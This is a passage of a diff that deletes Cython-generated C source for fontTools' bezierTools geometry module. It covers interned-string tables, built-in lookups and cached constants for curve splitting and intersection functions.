sizeof(__pyx_k_fontTools_misc), 0, 0, 1, 1}, - {&__pyx_n_s_fontTools_misc_arrayTools, __pyx_k_fontTools_misc_arrayTools, sizeof(__pyx_k_fontTools_misc_arrayTools), 0, 0, 1, 1}, - {&__pyx_n_s_fontTools_misc_bezierTools, __pyx_k_fontTools_misc_bezierTools, sizeof(__pyx_k_fontTools_misc_bezierTools), 0, 0, 1, 1}, - {&__pyx_n_s_fontTools_misc_transform, __pyx_k_fontTools_misc_transform, sizeof(__pyx_k_fontTools_misc_transform), 0, 0, 1, 1}, - {&__pyx_n_s_found, __pyx_k_found, sizeof(__pyx_k_found), 0, 0, 1, 1}, - {&__pyx_kp_u_g, __pyx_k_g, sizeof(__pyx_k_g), 0, 1, 0, 0}, - {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, - {&__pyx_n_s_genexpr, __pyx_k_genexpr, sizeof(__pyx_k_genexpr), 0, 0, 1, 1}, - {&__pyx_n_s_i, __pyx_k_i, sizeof(__pyx_k_i), 0, 0, 1, 1}, - {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, - {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, - {&__pyx_n_s_insert, __pyx_k_insert, sizeof(__pyx_k_insert), 0, 0, 1, 1}, - {&__pyx_n_s_intersection_ts, __pyx_k_intersection_ts, sizeof(__pyx_k_intersection_ts), 0, 0, 1, 1}, - {&__pyx_n_s_intersections, __pyx_k_intersections, sizeof(__pyx_k_intersections), 0, 0, 1, 1}, - {&__pyx_n_s_intersects, __pyx_k_intersects, sizeof(__pyx_k_intersects), 0, 0, 1, 1}, - {&__pyx_n_s_isHorizontal, __pyx_k_isHorizontal, sizeof(__pyx_k_isHorizontal), 0, 0, 1, 1}, - {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, - {&__pyx_n_s_isclose, __pyx_k_isclose, sizeof(__pyx_k_isclose), 0, 0, 1, 1}, - {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, - {&__pyx_n_s_it, __pyx_k_it, sizeof(__pyx_k_it), 0, 0, 1, 1}, - {&__pyx_n_s_key, __pyx_k_key, sizeof(__pyx_k_key), 0, 0, 1, 1}, - {&__pyx_n_s_line, __pyx_k_line, sizeof(__pyx_k_line), 0, 0, 1, 1}, - {&__pyx_n_s_lineLineIntersections, __pyx_k_lineLineIntersections, sizeof(__pyx_k_lineLineIntersections), 0, 0, 1, 1}, - {&__pyx_n_u_lineLineIntersections, __pyx_k_lineLineIntersections, sizeof(__pyx_k_lineLineIntersections), 0, 1, 0, 1}, - {&__pyx_kp_u_lineLineIntersections_line_1147, __pyx_k_lineLineIntersections_line_1147, sizeof(__pyx_k_lineLineIntersections_line_1147), 0, 1, 0, 0}, - {&__pyx_n_s_linePointAtT, __pyx_k_linePointAtT, sizeof(__pyx_k_linePointAtT), 0, 0, 1, 1}, - {&__pyx_n_u_linePointAtT, __pyx_k_linePointAtT, sizeof(__pyx_k_linePointAtT), 0, 1, 0, 1}, - {&__pyx_n_s_line_t, __pyx_k_line_t, sizeof(__pyx_k_line_t), 0, 0, 1, 1}, - {&__pyx_n_s_line_t_of_pt, __pyx_k_line_t_of_pt, sizeof(__pyx_k_line_t_of_pt), 0, 0, 1, 1}, - {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, - {&__pyx_n_u_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 1, 0, 1}, - {&__pyx_n_s_math, __pyx_k_math, sizeof(__pyx_k_math), 0, 0, 1, 1}, - {&__pyx_n_s_mid, __pyx_k_mid, sizeof(__pyx_k_mid), 0, 0, 1, 1}, - {&__pyx_n_s_midPt, __pyx_k_midPt, sizeof(__pyx_k_midPt), 0, 0, 1, 1}, - {&__pyx_n_s_midpoint, __pyx_k_midpoint, sizeof(__pyx_k_midpoint), 0, 0, 1, 1}, - {&__pyx_n_s_mult, __pyx_k_mult, sizeof(__pyx_k_mult), 0, 0, 1, 1}, - {&__pyx_n_s_n, __pyx_k_n, sizeof(__pyx_k_n), 0, 0, 1, 1}, - {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, - {&__pyx_n_s_namedtuple, __pyx_k_namedtuple, sizeof(__pyx_k_namedtuple), 0, 0, 1, 1}, - {&__pyx_n_s_obj, __pyx_k_obj, sizeof(__pyx_k_obj), 0, 0, 1, 1}, - {&__pyx_n_s_off1, __pyx_k_off1, sizeof(__pyx_k_off1), 0, 0, 1, 1}, - {&__pyx_n_s_off2, __pyx_k_off2, sizeof(__pyx_k_off2), 0, 0, 1, 1}, - {&__pyx_n_s_one, __pyx_k_one, sizeof(__pyx_k_one), 0, 0, 1, 1}, - {&__pyx_n_s_origDist, __pyx_k_origDist, sizeof(__pyx_k_origDist), 0, 0, 1, 1}, - {&__pyx_n_s_origin, __pyx_k_origin, sizeof(__pyx_k_origin), 0, 0, 1, 1}, - {&__pyx_n_s_p0, __pyx_k_p0, sizeof(__pyx_k_p0), 0, 0, 1, 1}, - {&__pyx_n_s_p1, __pyx_k_p1, sizeof(__pyx_k_p1), 0, 0, 1, 1}, - {&__pyx_n_s_p2, __pyx_k_p2, sizeof(__pyx_k_p2), 0, 0, 1, 1}, - {&__pyx_n_s_p3, __pyx_k_p3, sizeof(__pyx_k_p3), 0, 0, 1, 1}, - {&__pyx_n_s_pi, __pyx_k_pi, sizeof(__pyx_k_pi), 0, 0, 1, 1}, - {&__pyx_n_s_pointAtT, __pyx_k_pointAtT, sizeof(__pyx_k_pointAtT), 0, 0, 1, 1}, - {&__pyx_n_s_pointFinder, __pyx_k_pointFinder, sizeof(__pyx_k_pointFinder), 0, 0, 1, 1}, - {&__pyx_n_s_points, __pyx_k_points, sizeof(__pyx_k_points), 0, 0, 1, 1}, - {&__pyx_n_s_precision, __pyx_k_precision, sizeof(__pyx_k_precision), 0, 0, 1, 1}, - {&__pyx_n_s_print, __pyx_k_print, sizeof(__pyx_k_print), 0, 0, 1, 1}, - {&__pyx_n_s_printSegments, __pyx_k_printSegments, sizeof(__pyx_k_printSegments), 0, 0, 1, 1}, - {&__pyx_n_s_pt, __pyx_k_pt, sizeof(__pyx_k_pt), 0, 0, 1, 1}, - {&__pyx_n_u_pt, __pyx_k_pt, sizeof(__pyx_k_pt), 0, 1, 0, 1}, - {&__pyx_n_s_pt1, __pyx_k_pt1, sizeof(__pyx_k_pt1), 0, 0, 1, 1}, - {&__pyx_n_s_pt1x, __pyx_k_pt1x, sizeof(__pyx_k_pt1x), 0, 0, 1, 1}, - {&__pyx_n_s_pt1y, __pyx_k_pt1y, sizeof(__pyx_k_pt1y), 0, 0, 1, 1}, - {&__pyx_n_s_pt2, __pyx_k_pt2, sizeof(__pyx_k_pt2), 0, 0, 1, 1}, - {&__pyx_n_s_pt2x, __pyx_k_pt2x, sizeof(__pyx_k_pt2x), 0, 0, 1, 1}, - {&__pyx_n_s_pt2y, __pyx_k_pt2y, sizeof(__pyx_k_pt2y), 0, 0, 1, 1}, - {&__pyx_n_s_pt3, __pyx_k_pt3, sizeof(__pyx_k_pt3), 0, 0, 1, 1}, - {&__pyx_n_s_pt4, __pyx_k_pt4, sizeof(__pyx_k_pt4), 0, 0, 1, 1}, - {&__pyx_n_s_px, __pyx_k_px, sizeof(__pyx_k_px), 0, 0, 1, 1}, - {&__pyx_n_s_py, __pyx_k_py, sizeof(__pyx_k_py), 0, 0, 1, 1}, - {&__pyx_n_s_quadraticPointAtT, __pyx_k_quadraticPointAtT, sizeof(__pyx_k_quadraticPointAtT), 0, 0, 1, 1}, - {&__pyx_n_u_quadraticPointAtT, __pyx_k_quadraticPointAtT, sizeof(__pyx_k_quadraticPointAtT), 0, 1, 0, 1}, - {&__pyx_n_s_r, __pyx_k_r, sizeof(__pyx_k_r), 0, 0, 1, 1}, - {&__pyx_n_s_rDD, __pyx_k_rDD, sizeof(__pyx_k_rDD), 0, 0, 1, 1}, - {&__pyx_n_s_rQ2, __pyx_k_rQ2, sizeof(__pyx_k_rQ2), 0, 0, 1, 1}, - {&__pyx_n_s_range, __pyx_k_range, sizeof(__pyx_k_range), 0, 0, 1, 1}, - {&__pyx_n_s_range1, __pyx_k_range1, sizeof(__pyx_k_range1), 0, 0, 1, 1}, - {&__pyx_n_s_range2, __pyx_k_range2, sizeof(__pyx_k_range2), 0, 0, 1, 1}, - {&__pyx_n_s_rectArea, __pyx_k_rectArea, sizeof(__pyx_k_rectArea), 0, 0, 1, 1}, - {&__pyx_n_s_roots, __pyx_k_roots, sizeof(__pyx_k_roots), 0, 0, 1, 1}, - {&__pyx_n_s_rotate, __pyx_k_rotate, sizeof(__pyx_k_rotate), 0, 0, 1, 1}, - {&__pyx_n_s_round, __pyx_k_round, sizeof(__pyx_k_round), 0, 0, 1, 1}, - {&__pyx_n_s_s, __pyx_k_s, sizeof(__pyx_k_s), 0, 0, 1, 1}, - {&__pyx_n_s_s1, __pyx_k_s1, sizeof(__pyx_k_s1), 0, 0, 1, 1}, - {&__pyx_n_s_s1x, __pyx_k_s1x, sizeof(__pyx_k_s1x), 0, 0, 1, 1}, - {&__pyx_n_s_s1y, __pyx_k_s1y, sizeof(__pyx_k_s1y), 0, 0, 1, 1}, - {&__pyx_n_s_s2, __pyx_k_s2, sizeof(__pyx_k_s2), 0, 0, 1, 1}, - {&__pyx_n_s_s2x, __pyx_k_s2x, sizeof(__pyx_k_s2x), 0, 0, 1, 1}, - {&__pyx_n_s_s2y, __pyx_k_s2y, sizeof(__pyx_k_s2y), 0, 0, 1, 1}, - {&__pyx_kp_u_s_2, __pyx_k_s_2, sizeof(__pyx_k_s_2), 0, 1, 0, 0}, - {&__pyx_n_s_scale, __pyx_k_scale, sizeof(__pyx_k_scale), 0, 0, 1, 1}, - {&__pyx_n_s_sectRect, __pyx_k_sectRect, sizeof(__pyx_k_sectRect), 0, 0, 1, 1}, - {&__pyx_n_s_seen, __pyx_k_seen, sizeof(__pyx_k_seen), 0, 0, 1, 1}, - {&__pyx_n_s_seg, __pyx_k_seg, sizeof(__pyx_k_seg), 0, 0, 1, 1}, - {&__pyx_n_s_seg1, __pyx_k_seg1, sizeof(__pyx_k_seg1), 0, 0, 1, 1}, - {&__pyx_n_s_seg2, __pyx_k_seg2, sizeof(__pyx_k_seg2), 0, 0, 1, 1}, - {&__pyx_n_s_segment, __pyx_k_segment, sizeof(__pyx_k_segment), 0, 0, 1, 1}, - {&__pyx_n_s_segmentPointAtT, __pyx_k_segmentPointAtT, sizeof(__pyx_k_segmentPointAtT), 0, 0, 1, 1}, - {&__pyx_n_u_segmentPointAtT, __pyx_k_segmentPointAtT, sizeof(__pyx_k_segmentPointAtT), 0, 1, 0, 1}, - {&__pyx_n_s_segmentSegmentIntersections, __pyx_k_segmentSegmentIntersections, sizeof(__pyx_k_segmentSegmentIntersections), 0, 0, 1, 1}, - {&__pyx_n_u_segmentSegmentIntersections, __pyx_k_segmentSegmentIntersections, sizeof(__pyx_k_segmentSegmentIntersections), 0, 1, 0, 1}, - {&__pyx_kp_u_segmentSegmentIntersections_line, __pyx_k_segmentSegmentIntersections_line, sizeof(__pyx_k_segmentSegmentIntersections_line), 0, 1, 0, 0}, - {&__pyx_n_s_segmentrepr, __pyx_k_segmentrepr, sizeof(__pyx_k_segmentrepr), 0, 0, 1, 1}, - {&__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2, __pyx_k_segmentrepr_1_2_3_2_3_4_0_1_2, sizeof(__pyx_k_segmentrepr_1_2_3_2_3_4_0_1_2), 0, 1, 0, 0}, - {&__pyx_kp_u_segmentrepr_line_1449, __pyx_k_segmentrepr_line_1449, sizeof(__pyx_k_segmentrepr_line_1449), 0, 1, 0, 0}, - {&__pyx_n_s_segmentrepr_locals_genexpr, __pyx_k_segmentrepr_locals_genexpr, sizeof(__pyx_k_segmentrepr_locals_genexpr), 0, 0, 1, 1}, - {&__pyx_n_s_segments, __pyx_k_segments, sizeof(__pyx_k_segments), 0, 0, 1, 1}, - {&__pyx_n_s_send, __pyx_k_send, sizeof(__pyx_k_send), 0, 0, 1, 1}, - {&__pyx_n_s_slope12, __pyx_k_slope12, sizeof(__pyx_k_slope12), 0, 0, 1, 1}, - {&__pyx_n_s_slope34, __pyx_k_slope34, sizeof(__pyx_k_slope34), 0, 0, 1, 1}, - {&__pyx_n_s_solutions, __pyx_k_solutions, sizeof(__pyx_k_solutions), 0, 0, 1, 1}, - {&__pyx_n_s_solveCubic, __pyx_k_solveCubic, sizeof(__pyx_k_solveCubic), 0, 0, 1, 1}, - {&__pyx_n_u_solveCubic, __pyx_k_solveCubic, sizeof(__pyx_k_solveCubic), 0, 1, 0, 1}, - {&__pyx_kp_u_solveCubic_line_841, __pyx_k_solveCubic_line_841, sizeof(__pyx_k_solveCubic_line_841), 0, 1, 0, 0}, - {&__pyx_n_s_solveQuadratic, __pyx_k_solveQuadratic, sizeof(__pyx_k_solveQuadratic), 0, 0, 1, 1}, - {&__pyx_n_u_solveQuadratic, __pyx_k_solveQuadratic, sizeof(__pyx_k_solveQuadratic), 0, 1, 0, 1}, - {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, - {&__pyx_n_s_splitCubic, __pyx_k_splitCubic, sizeof(__pyx_k_splitCubic), 0, 0, 1, 1}, - {&__pyx_n_u_splitCubic, __pyx_k_splitCubic, sizeof(__pyx_k_splitCubic), 0, 1, 0, 1}, - {&__pyx_n_s_splitCubicAtT, __pyx_k_splitCubicAtT, sizeof(__pyx_k_splitCubicAtT), 0, 0, 1, 1}, - {&__pyx_n_s_splitCubicAtTC, __pyx_k_splitCubicAtTC, sizeof(__pyx_k_splitCubicAtTC), 0, 0, 1, 1}, - {&__pyx_n_u_splitCubicAtTC, __pyx_k_splitCubicAtTC, sizeof(__pyx_k_splitCubicAtTC), 0, 1, 0, 1}, - {&__pyx_n_s_splitCubicAtTC_2, __pyx_k_splitCubicAtTC_2, sizeof(__pyx_k_splitCubicAtTC_2), 0, 0, 1, 1}, - {&__pyx_n_s_splitCubicAtT_2, __pyx_k_splitCubicAtT_2, sizeof(__pyx_k_splitCubicAtT_2), 0, 0, 1, 1}, - {&__pyx_n_u_splitCubicAtT_2, __pyx_k_splitCubicAtT_2, sizeof(__pyx_k_splitCubicAtT_2), 0, 1, 0, 1}, - {&__pyx_kp_u_splitCubicAtT_line_613, __pyx_k_splitCubicAtT_line_613, sizeof(__pyx_k_splitCubicAtT_line_613), 0, 1, 0, 0}, - {&__pyx_n_s_splitCubicIntoTwoAtTC, __pyx_k_splitCubicIntoTwoAtTC, sizeof(__pyx_k_splitCubicIntoTwoAtTC), 0, 0, 1, 1}, - {&__pyx_n_u_splitCubicIntoTwoAtTC, __pyx_k_splitCubicIntoTwoAtTC, sizeof(__pyx_k_splitCubicIntoTwoAtTC), 0, 1, 0, 1}, - {&__pyx_kp_u_splitCubic_line_552, __pyx_k_splitCubic_line_552, sizeof(__pyx_k_splitCubic_line_552), 0, 1, 0, 0}, - {&__pyx_n_s_splitCubic_locals_genexpr, __pyx_k_splitCubic_locals_genexpr, sizeof(__pyx_k_splitCubic_locals_genexpr), 0, 0, 1, 1}, - {&__pyx_n_s_splitLine, __pyx_k_splitLine, sizeof(__pyx_k_splitLine), 0, 0, 1, 1}, - {&__pyx_n_u_splitLine, __pyx_k_splitLine, sizeof(__pyx_k_splitLine), 0, 1, 0, 1}, - {&__pyx_kp_u_splitLine_line_450, __pyx_k_splitLine_line_450, sizeof(__pyx_k_splitLine_line_450), 0, 1, 0, 0}, - {&__pyx_n_s_splitQuadratic, __pyx_k_splitQuadratic, sizeof(__pyx_k_splitQuadratic), 0, 0, 1, 1}, - {&__pyx_n_u_splitQuadratic, __pyx_k_splitQuadratic, sizeof(__pyx_k_splitQuadratic), 0, 1, 0, 1}, - {&__pyx_n_s_splitQuadraticAtT, __pyx_k_splitQuadraticAtT, sizeof(__pyx_k_splitQuadraticAtT), 0, 0, 1, 1}, - {&__pyx_n_s_splitQuadraticAtT_2, __pyx_k_splitQuadraticAtT_2, sizeof(__pyx_k_splitQuadraticAtT_2), 0, 0, 1, 1}, - {&__pyx_n_u_splitQuadraticAtT_2, __pyx_k_splitQuadraticAtT_2, sizeof(__pyx_k_splitQuadraticAtT_2), 0, 1, 0, 1}, - {&__pyx_kp_u_splitQuadraticAtT_line_589, __pyx_k_splitQuadraticAtT_line_589, sizeof(__pyx_k_splitQuadraticAtT_line_589), 0, 1, 0, 0}, - {&__pyx_kp_u_splitQuadratic_line_507, __pyx_k_splitQuadratic_line_507, sizeof(__pyx_k_splitQuadratic_line_507), 0, 1, 0, 0}, - {&__pyx_n_s_splitQuadratic_locals_genexpr, __pyx_k_splitQuadratic_locals_genexpr, sizeof(__pyx_k_splitQuadratic_locals_genexpr), 0, 0, 1, 1}, - {&__pyx_n_s_split_cubic_into_two, __pyx_k_split_cubic_into_two, sizeof(__pyx_k_split_cubic_into_two), 0, 0, 1, 1}, - {&__pyx_n_s_split_segment_at_t, __pyx_k_split_segment_at_t, sizeof(__pyx_k_split_segment_at_t), 0, 0, 1, 1}, - {&__pyx_n_s_sqrt, __pyx_k_sqrt, sizeof(__pyx_k_sqrt), 0, 0, 1, 1}, - {&__pyx_n_s_start, __pyx_k_start, sizeof(__pyx_k_start), 0, 0, 1, 1}, - {&__pyx_n_s_swapped, __pyx_k_swapped, sizeof(__pyx_k_swapped), 0, 0, 1, 1}, - {&__pyx_n_s_sx, __pyx_k_sx, sizeof(__pyx_k_sx), 0, 0, 1, 1}, - {&__pyx_n_s_sy, __pyx_k_sy, sizeof(__pyx_k_sy), 0, 0, 1, 1}, - {&__pyx_n_s_sys, __pyx_k_sys, sizeof(__pyx_k_sys), 0, 0, 1, 1}, - {&__pyx_n_s_t, __pyx_k_t, sizeof(__pyx_k_t), 0, 0, 1, 1}, - {&__pyx_n_s_t1, __pyx_k_t1, sizeof(__pyx_k_t1), 0, 0, 1, 1}, - {&__pyx_n_u_t1, __pyx_k_t1, sizeof(__pyx_k_t1), 0, 1, 0, 1}, - {&__pyx_n_s_t1_2, __pyx_k_t1_2, sizeof(__pyx_k_t1_2), 0, 0, 1, 1}, - {&__pyx_n_s_t1_3, __pyx_k_t1_3, sizeof(__pyx_k_t1_3), 0, 0, 1, 1}, - {&__pyx_n_s_t2, __pyx_k_t2, sizeof(__pyx_k_t2), 0, 0, 1, 1}, - {&__pyx_n_u_t2, __pyx_k_t2, sizeof(__pyx_k_t2), 0, 1, 0, 1}, - {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, - {&__pyx_n_s_testmod, __pyx_k_testmod, sizeof(__pyx_k_testmod), 0, 0, 1, 1}, - {&__pyx_n_s_theta, __pyx_k_theta, sizeof(__pyx_k_theta), 0, 0, 1, 1}, - {&__pyx_n_s_throw, __pyx_k_throw, sizeof(__pyx_k_throw), 0, 0, 1, 1}, - {&__pyx_n_s_tolerance, __pyx_k_tolerance, sizeof(__pyx_k_tolerance), 0, 0, 1, 1}, - {&__pyx_n_s_transformPoints, __pyx_k_transformPoints, sizeof(__pyx_k_transformPoints), 0, 0, 1, 1}, - {&__pyx_n_s_translate, __pyx_k_translate, sizeof(__pyx_k_translate), 0, 0, 1, 1}, - {&__pyx_n_s_ts, __pyx_k_ts, sizeof(__pyx_k_ts), 0, 0, 1, 1}, - {&__pyx_n_s_two, __pyx_k_two, sizeof(__pyx_k_two), 0, 0, 1, 1}, - {&__pyx_n_s_unique_key, __pyx_k_unique_key, sizeof(__pyx_k_unique_key), 0, 0, 1, 1}, - {&__pyx_n_s_unique_values, __pyx_k_unique_values, sizeof(__pyx_k_unique_values), 0, 0, 1, 1}, - {&__pyx_n_s_v0, __pyx_k_v0, sizeof(__pyx_k_v0), 0, 0, 1, 1}, - {&__pyx_n_s_v1, __pyx_k_v1, sizeof(__pyx_k_v1), 0, 0, 1, 1}, - {&__pyx_n_s_v2, __pyx_k_v2, sizeof(__pyx_k_v2), 0, 0, 1, 1}, - {&__pyx_n_s_v3, __pyx_k_v3, sizeof(__pyx_k_v3), 0, 0, 1, 1}, - {&__pyx_n_s_v4, __pyx_k_v4, sizeof(__pyx_k_v4), 0, 0, 1, 1}, - {&__pyx_n_s_where, __pyx_k_where, sizeof(__pyx_k_where), 0, 0, 1, 1}, - {&__pyx_n_s_x, __pyx_k_x, sizeof(__pyx_k_x), 0, 0, 1, 1}, - {&__pyx_n_s_x0, __pyx_k_x0, sizeof(__pyx_k_x0), 0, 0, 1, 1}, - {&__pyx_n_s_x1, __pyx_k_x1, sizeof(__pyx_k_x1), 0, 0, 1, 1}, - {&__pyx_n_s_x2, __pyx_k_x2, sizeof(__pyx_k_x2), 0, 0, 1, 1}, - {&__pyx_n_s_x3, __pyx_k_x3, sizeof(__pyx_k_x3), 0, 0, 1, 1}, - {&__pyx_n_s_x4, __pyx_k_x4, sizeof(__pyx_k_x4), 0, 0, 1, 1}, - {&__pyx_n_s_xDiff, __pyx_k_xDiff, sizeof(__pyx_k_xDiff), 0, 0, 1, 1}, - {&__pyx_n_s_xRoots, __pyx_k_xRoots, sizeof(__pyx_k_xRoots), 0, 0, 1, 1}, - {&__pyx_n_s_y, __pyx_k_y, sizeof(__pyx_k_y), 0, 0, 1, 1}, - {&__pyx_n_s_y1, __pyx_k_y1, sizeof(__pyx_k_y1), 0, 0, 1, 1}, - {&__pyx_n_s_y2, __pyx_k_y2, sizeof(__pyx_k_y2), 0, 0, 1, 1}, - {&__pyx_n_s_y3, __pyx_k_y3, sizeof(__pyx_k_y3), 0, 0, 1, 1}, - {&__pyx_n_s_y4, __pyx_k_y4, sizeof(__pyx_k_y4), 0, 0, 1, 1}, - {&__pyx_n_s_yDiff, __pyx_k_yDiff, sizeof(__pyx_k_yDiff), 0, 0, 1, 1}, - {&__pyx_n_s_yRoots, __pyx_k_yRoots, sizeof(__pyx_k_yRoots), 0, 0, 1, 1}, - {0, 0, 0, 0, 0, 0, 0} - }; - return __Pyx_InitStrings(__pyx_string_tab); -} -/* #### Code section: cached_builtins ### */ -static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { - __pyx_builtin_AttributeError = __Pyx_GetBuiltinName(__pyx_n_s_AttributeError); if (!__pyx_builtin_AttributeError) __PYX_ERR(0, 14, __pyx_L1_error) - __pyx_builtin_ImportError = __Pyx_GetBuiltinName(__pyx_n_s_ImportError); if (!__pyx_builtin_ImportError) __PYX_ERR(0, 14, __pyx_L1_error) - __pyx_builtin_range = __Pyx_GetBuiltinName(__pyx_n_s_range); if (!__pyx_builtin_range) __PYX_ERR(0, 709, __pyx_L1_error) - __pyx_builtin_round = __Pyx_GetBuiltinName(__pyx_n_s_round); if (!__pyx_builtin_round) __PYX_ERR(0, 899, __pyx_L1_error) - __pyx_builtin_ValueError = __Pyx_GetBuiltinName(__pyx_n_s_ValueError); if (!__pyx_builtin_ValueError) __PYX_ERR(0, 1119, __pyx_L1_error) - __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(0, 1456, __pyx_L1_error) - __pyx_builtin_print = __Pyx_GetBuiltinName(__pyx_n_s_print); if (!__pyx_builtin_print) __PYX_ERR(0, 1467, __pyx_L1_error) - return 0; - __pyx_L1_error:; - return -1; -} -/* #### Code section: cached_constants ### */ - -static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); - - /* "fontTools/misc/bezierTools.py":704 - * ts = list(ts) - * segments = [] - * ts.insert(0, 0.0) # <<<<<<<<<<<<<< - * ts.append(1.0) - * ax, ay = a - */ - __pyx_tuple__2 = PyTuple_Pack(2, __pyx_int_0, __pyx_float_0_0); if (unlikely(!__pyx_tuple__2)) __PYX_ERR(0, 704, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__2); - __Pyx_GIVEREF(__pyx_tuple__2); - - /* "fontTools/misc/bezierTools.py":1119 - * elif len(seg) == 4: - * return cubicPointAtT(*seg, t) - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * - * - */ - __pyx_tuple__4 = PyTuple_Pack(1, __pyx_kp_u_Unknown_curve_degree); if (unlikely(!__pyx_tuple__4)) __PYX_ERR(0, 1119, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__4); - __Pyx_GIVEREF(__pyx_tuple__4); - - /* "fontTools/misc/bezierTools.py":1313 - * - * if not range1: - * range1 = (0.0, 1.0) # <<<<<<<<<<<<<< - * if not range2: - * range2 = (0.0, 1.0) - */ - __pyx_tuple__5 = PyTuple_Pack(2, __pyx_float_0_0, __pyx_float_1_0); if (unlikely(!__pyx_tuple__5)) __PYX_ERR(0, 1313, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__5); - __Pyx_GIVEREF(__pyx_tuple__5); - - /* "fontTools/misc/bezierTools.py":1322 - * return [] - * - * def midpoint(r): # <<<<<<<<<<<<<< - * return 0.5 * (r[0] + r[1]) - * - */ - __pyx_tuple__6 = PyTuple_Pack(1, __pyx_n_s_r); if (unlikely(!__pyx_tuple__6)) __PYX_ERR(0, 1322, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__6); - __Pyx_GIVEREF(__pyx_tuple__6); - __pyx_codeobj__7 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__6, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_midpoint, 1322, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__7)) __PYX_ERR(0, 1322, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1443 - * intersections = lineLineIntersections(*seg1, *seg2) - * else: - * raise ValueError("Couldn't work out which intersection function to use") # <<<<<<<<<<<<<< - * if not swapped: - * return intersections - */ - __pyx_tuple__8 = PyTuple_Pack(1, __pyx_kp_u_Couldn_t_work_out_which_intersec); if (unlikely(!__pyx_tuple__8)) __PYX_ERR(0, 1443, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__8); - __Pyx_GIVEREF(__pyx_tuple__8); - - /* "fontTools/misc/bezierTools.py":56 - * - * - * def calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< - * """Calculates the arc length for a cubic Bezier segment. - * - */ - __pyx_tuple__12 = PyTuple_Pack(5, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_tolerance); if (unlikely(!__pyx_tuple__12)) __PYX_ERR(0, 56, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__12); - __Pyx_GIVEREF(__pyx_tuple__12); - __pyx_codeobj__13 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicArcLength, 56, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__13)) __PYX_ERR(0, 56, __pyx_L1_error) - __pyx_tuple__14 = PyTuple_Pack(1, ((PyObject*)__pyx_float_0_005)); if (unlikely(!__pyx_tuple__14)) __PYX_ERR(0, 56, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__14); - __Pyx_GIVEREF(__pyx_tuple__14); - - /* "fontTools/misc/bezierTools.py":75 - * - * - * def _split_cubic_into_two(p0, p1, p2, p3): # <<<<<<<<<<<<<< - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - */ - __pyx_tuple__15 = PyTuple_Pack(6, __pyx_n_s_p0, __pyx_n_s_p1, __pyx_n_s_p2, __pyx_n_s_p3, __pyx_n_s_mid, __pyx_n_s_deriv3); if (unlikely(!__pyx_tuple__15)) __PYX_ERR(0, 75, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__15); - __Pyx_GIVEREF(__pyx_tuple__15); - __pyx_codeobj__16 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__15, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_split_cubic_into_two, 75, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__16)) __PYX_ERR(0, 75, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":84 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * p0=cython.complex, - */ - __pyx_tuple__17 = PyTuple_Pack(9, __pyx_n_s_mult, __pyx_n_s_p0, __pyx_n_s_p1, __pyx_n_s_p2, __pyx_n_s_p3, __pyx_n_s_arch, __pyx_n_s_box, __pyx_n_s_one, __pyx_n_s_two); if (unlikely(!__pyx_tuple__17)) __PYX_ERR(0, 84, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__17); - __Pyx_GIVEREF(__pyx_tuple__17); - 